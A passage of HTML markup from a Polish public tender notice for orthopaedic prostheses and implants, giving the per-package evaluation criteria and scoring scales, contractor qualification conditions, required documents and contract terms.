class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 3 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33183200-8 - Protezy ortopedyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33183100-7 - Implanty ortopedyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin realizacji dostaw częściowych	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/>	<br/><br/>1.1 Kryterium „Cena”: <br/>Oferty oceniane będą na podstawie ceny podanej w formularzu ofertowym. Największą ilość punktów (60,00) otrzyma oferta z najniższą ceną ofertową brutto, pozostałe oferty oceniane będą zgodnie <br/>ze wzorem:<br/><br/> najniższa cena ofertowa<br/>C = ------------------------------------ x 60,00 <br/> cena oferty badanej<br/><br/>1.2. Kryterium „Termin realizacji dostaw częściowych” – 20 pkt <br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów (20,00) otrzyma oferta, która zaoferuje najkrótszy termin realizacji dostaw. Maksymalny termin realizacji dostaw nie może być dłuższy niż 6 dni roboczych od otrzymania zgłoszenia. Oferty uzyskają następującą liczbę punktów:<br/>do 2 dni roboczych – 20,00 pkt<br/>3 dni robocze – 15,00 pkt <br/>4 dni robocze – 10,00 pkt<br/>5 dni robocze – 5,00 pkt <br/>6 dni robocze – 0,00 pkt <br/>Oferta Wykonawcy, który zaoferuje termin realizacji dostaw dłuższy niż 6 dni roboczych zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp jako oferta niezgodna z treścią SWZ.<br/><br/>1.3. kryterium „Termin rozpatrzenia reklamacji jakościowej” – 20 pkt<br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów otrzyma oferta, która zaoferuje najkrótszy termin rozpatrzenia reklamacji. Zamawiający wymaga, aby termin rozpatrzenia reklamacji wynosił maksymalnie 14 dni licząc od zgłoszenia reklamacji. Oferty uzyskają następującą liczbę punktów:<br/>za rozpatrzenie reklamacji jakościowej w terminie do 5 dni – 20,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 6 - 7 dni – 15,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 8 - 9 dni – 10,00 pkt <br/>za rozpatrzenie reklamacji jakościowej w terminie 10 - 12 dni – 5,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 13 - 14 dni – 0,00 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 4 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33183200-8 - Protezy ortopedyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33183100-7 - Implanty ortopedyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin realizacji dostaw częściowych	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/>	<br/><br/>1.1 Kryterium „Cena”: <br/>Oferty oceniane będą na podstawie ceny podanej w formularzu ofertowym. Największą ilość punktów (60,00) otrzyma oferta z najniższą ceną ofertową brutto, pozostałe oferty oceniane będą zgodnie <br/>ze wzorem:<br/><br/> najniższa cena ofertowa<br/>C = ------------------------------------ x 60,00 <br/> cena oferty badanej<br/><br/>1.2. Kryterium „Termin realizacji dostaw częściowych” – 20 pkt <br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów (20,00) otrzyma oferta, która zaoferuje najkrótszy termin realizacji dostaw. Maksymalny termin realizacji dostaw nie może być dłuższy niż 6 dni roboczych od otrzymania zgłoszenia. Oferty uzyskają następującą liczbę punktów:<br/>do 2 dni roboczych – 20,00 pkt<br/>3 dni robocze – 15,00 pkt <br/>4 dni robocze – 10,00 pkt<br/>5 dni robocze – 5,00 pkt <br/>6 dni robocze – 0,00 pkt <br/>Oferta Wykonawcy, który zaoferuje termin realizacji dostaw dłuższy niż 6 dni roboczych zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp jako oferta niezgodna z treścią SWZ.<br/><br/>1.3. kryterium „Termin rozpatrzenia reklamacji jakościowej” – 20 pkt<br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów otrzyma oferta, która zaoferuje najkrótszy termin rozpatrzenia reklamacji. Zamawiający wymaga, aby termin rozpatrzenia reklamacji wynosił maksymalnie 14 dni licząc od zgłoszenia reklamacji. Oferty uzyskają następującą liczbę punktów:<br/>za rozpatrzenie reklamacji jakościowej w terminie do 5 dni – 20,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 6 - 7 dni – 15,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 8 - 9 dni – 10,00 pkt <br/>za rozpatrzenie reklamacji jakościowej w terminie 10 - 12 dni – 5,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 13 - 14 dni – 0,00 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 4 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33183200-8 - Protezy ortopedyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33183100-7 - Implanty ortopedyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin realizacji dostaw częściowych	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/>	<br/><br/>1.1 Kryterium „Cena”: <br/>Oferty oceniane będą na podstawie ceny podanej w formularzu ofertowym. Największą ilość punktów (60,00) otrzyma oferta z najniższą ceną ofertową brutto, pozostałe oferty oceniane będą zgodnie <br/>ze wzorem:<br/><br/> najniższa cena ofertowa<br/>C = ------------------------------------ x 60,00 <br/> cena oferty badanej<br/><br/>1.2. Kryterium „Termin realizacji dostaw częściowych” – 20 pkt <br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów (20,00) otrzyma oferta, która zaoferuje najkrótszy termin realizacji dostaw. Maksymalny termin realizacji dostaw nie może być dłuższy niż 6 dni roboczych od otrzymania zgłoszenia. Oferty uzyskają następującą liczbę punktów:<br/>do 2 dni roboczych – 20,00 pkt<br/>3 dni robocze – 15,00 pkt <br/>4 dni robocze – 10,00 pkt<br/>5 dni robocze – 5,00 pkt <br/>6 dni robocze – 0,00 pkt <br/>Oferta Wykonawcy, który zaoferuje termin realizacji dostaw dłuższy niż 6 dni roboczych zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp jako oferta niezgodna z treścią SWZ.<br/><br/>1.3. kryterium „Termin rozpatrzenia reklamacji jakościowej” – 20 pkt<br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów otrzyma oferta, która zaoferuje najkrótszy termin rozpatrzenia reklamacji. Zamawiający wymaga, aby termin rozpatrzenia reklamacji wynosił maksymalnie 14 dni licząc od zgłoszenia reklamacji. Oferty uzyskają następującą liczbę punktów:<br/>za rozpatrzenie reklamacji jakościowej w terminie do 5 dni – 20,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 6 - 7 dni – 15,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 8 - 9 dni – 10,00 pkt <br/>za rozpatrzenie reklamacji jakościowej w terminie 10 - 12 dni – 5,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 13 - 14 dni – 0,00 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 6 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33183200-8 - Protezy ortopedyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33183100-7 - Implanty ortopedyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>L.p.	Nazwa kryterium	Znaczenie kryterium (w %)<br/>1	Cena (C)	60,00<br/>2	Termin realizacji dostaw częściowych	20,00<br/>3	Termin rozpatrzenia reklamacji jakościowej	20,00<br/>	<br/><br/>1.1 Kryterium „Cena”: <br/>Oferty oceniane będą na podstawie ceny podanej w formularzu ofertowym. Największą ilość punktów (60,00) otrzyma oferta z najniższą ceną ofertową brutto, pozostałe oferty oceniane będą zgodnie <br/>ze wzorem:<br/><br/> najniższa cena ofertowa<br/>C = ------------------------------------ x 60,00 <br/> cena oferty badanej<br/><br/>1.2. Kryterium „Termin realizacji dostaw częściowych” – 20 pkt <br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów (20,00) otrzyma oferta, która zaoferuje najkrótszy termin realizacji dostaw. Maksymalny termin realizacji dostaw nie może być dłuższy niż 6 dni roboczych od otrzymania zgłoszenia. Oferty uzyskają następującą liczbę punktów:<br/>do 2 dni roboczych – 20,00 pkt<br/>3 dni robocze – 15,00 pkt <br/>4 dni robocze – 10,00 pkt<br/>5 dni robocze – 5,00 pkt <br/>6 dni robocze – 0,00 pkt <br/>Oferta Wykonawcy, który zaoferuje termin realizacji dostaw dłuższy niż 6 dni roboczych zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp jako oferta niezgodna z treścią SWZ.<br/><br/>1.3. kryterium „Termin rozpatrzenia reklamacji jakościowej” – 20 pkt<br/>Kryterium oceniane będzie na podstawie oświadczenia Wykonawcy zawartego w Formularzu ofertowym. Największą ilość punktów otrzyma oferta, która zaoferuje najkrótszy termin rozpatrzenia reklamacji. Zamawiający wymaga, aby termin rozpatrzenia reklamacji wynosił maksymalnie 14 dni licząc od zgłoszenia reklamacji. Oferty uzyskają następującą liczbę punktów:<br/>za rozpatrzenie reklamacji jakościowej w terminie do 5 dni – 20,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 6 - 7 dni – 15,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 8 - 9 dni – 10,00 pkt <br/>za rozpatrzenie reklamacji jakościowej w terminie 10 - 12 dni – 5,00 pkt<br/>za rozpatrzenie reklamacji jakościowej w terminie 13 - 14 dni – 0,00 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie spełniony poprzez złożenie oświadczenia składanego na podst. art. 125 ust. 1 ustawy Pzp – Załącznik nr 3 <br/>do SWZ.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie spełniony poprzez złożenie oświadczenia składanego na podst. art. 125 ust. 1 ustawy Pzp – Załącznik nr 3 <br/>do SWZ.<br/>3)	sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie spełniony poprzez złożenie oświadczenia składanego na podst. art. 125 ust. 1 ustawy Pzp – Załącznik nr 3 <br/>do SWZ.<br/>4)	zdolności technicznej lub zawodowej<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie spełniony poprzez złożenie oświadczenia składanego na podst. art. 125 ust. 1 ustawy Pzp – Załącznik nr 3 <br/>do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Wraz z ofertą Wykonawca zobowiązany jest złożyć następujące, przedmiotowe środki dowodowe:<br/>a)	Oświadczenie o posiadaniu dokumentów potwierdzających dopuszczenie oferowanego przedmiotu zamówienia do obrotu na terenie Polski, zgodnie z Ustawą z dnia 7 kwietnia 2022 r. o wyrobach medycznych (t.j. Dz.U. z 2022r. poz. 974 z późn.zm.) oraz, że odpowiednie dokumenty zostaną dostarczone Zamawiającemu na każde jego wezwanie.<br/>W przypadku, gdy przedmiot zamówienia nie jest kwalifikowany jako wyrób medyczny stosowne oświadczenie w tym zakresie.<br/>b)	Karty techniczne produktu/katalogi/foldery/prospekty w języku polskim każdego zaoferowanego przedmiotu zamówienia - zawierający dane identyfikujące zaoferowany przedmiot zamówienia wraz z numerem katalogowym zaoferowanego przedmiotu zamówienia (numer katalogowy musi być zgodny, z numerem podanym w formularzu asortymentowo- cenowym) - w oparciu o które została przygotowana oferta. W karcie technicznej/katalogu/folderze należy wyraźnie zaznaczyć, których pozycji pakietu (Załącznika nr 2 do SWZ) dotyczy dany zapis – celem identyfikacji oferowanego przedmiotu zamówienia i numeru katalogowego. W przypadku braku numeru katalogowego lub informacji o numerze katalogowym w katalogu, prospekcie lub folderze, należy złożyć oświadczenie Wykonawcy, w powyższym zakresie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1.	Wraz z ofertą Wykonawca zobowiązany jest złożyć następujące, przedmiotowe środki dowodowe:<br/>a)	Oświadczenie o posiadaniu dokumentów potwierdzających dopuszczenie oferowanego przedmiotu zamówienia do obrotu na terenie Polski, zgodnie z Ustawą z dnia 7 kwietnia 2022 r. o wyrobach medycznych (t.j. Dz.U. z 2022r. poz. 974 z późn.zm.) oraz, że odpowiednie dokumenty zostaną dostarczone Zamawiającemu na każde jego wezwanie.<br/>W przypadku, gdy przedmiot zamówienia nie jest kwalifikowany jako wyrób medyczny stosowne oświadczenie w tym zakresie.<br/>b)	Karty techniczne produktu/katalogi/foldery/prospekty w języku polskim każdego zaoferowanego przedmiotu zamówienia - zawierający dane identyfikujące zaoferowany przedmiot zamówienia wraz z numerem katalogowym zaoferowanego przedmiotu zamówienia (numer katalogowy musi być zgodny, z numerem podanym w formularzu asortymentowo- cenowym) - w oparciu o które została przygotowana oferta. W karcie technicznej/katalogu/folderze należy wyraźnie zaznaczyć, których pozycji pakietu (Załącznika nr 2 do SWZ) dotyczy dany zapis – celem identyfikacji oferowanego przedmiotu zamówienia i numeru katalogowego. W przypadku braku numeru katalogowego lub informacji o numerze katalogowym w katalogu, prospekcie lub folderze, należy złożyć oświadczenie Wykonawcy, w powyższym zakresie. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Uzupełniony formularz ofertowy – zgodnie z Załącznikiem Nr 1 do SWZ.<br/>2.	Uzupełniony formularz asortymentowo – cenowy - zgodnie z Załącznikiem Nr 2 do SWZ.<br/>3.	Oświadczenie podmiotu udostępniającego zasoby - Załącznik nr 4 do SWZ ( jeżeli dotyczy).<br/>4.	Zobowiązanie podmiotu udostępniającego zasoby - Załącznik nr 5 do SWZ( jeżeli dotyczy).<br/>5.	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia – Załącznik Nr 6 do SWZ ( jeżeli dotyczy).<br/>6.	Pełnomocnictwo upoważniające do złożenia oferty, jeżeli ofertę składa pełnomocnik.<br/>7.	Pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. ( jeżeli dotyczy).<br/>8.	Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (t.j. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym).<br/>9.	Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio <br/>w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 §2 ustawy z dnia 14 lutego 1991 r. Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym <br/>lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo <br/>do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem (Liderem).<br/>2.	Treść pełnomocnictwa powinna dokładnie określać zakres umocowania. Pełnomocnictwo <br/>w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym <br/> lub podpisem osobistym należy złożyć wraz z ofertą.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność <br/>za wykonanie umowy.<br/>4.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>5.	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w sprawie zamówienia publicznego, na podstawie art. 454 - 455 ustawy 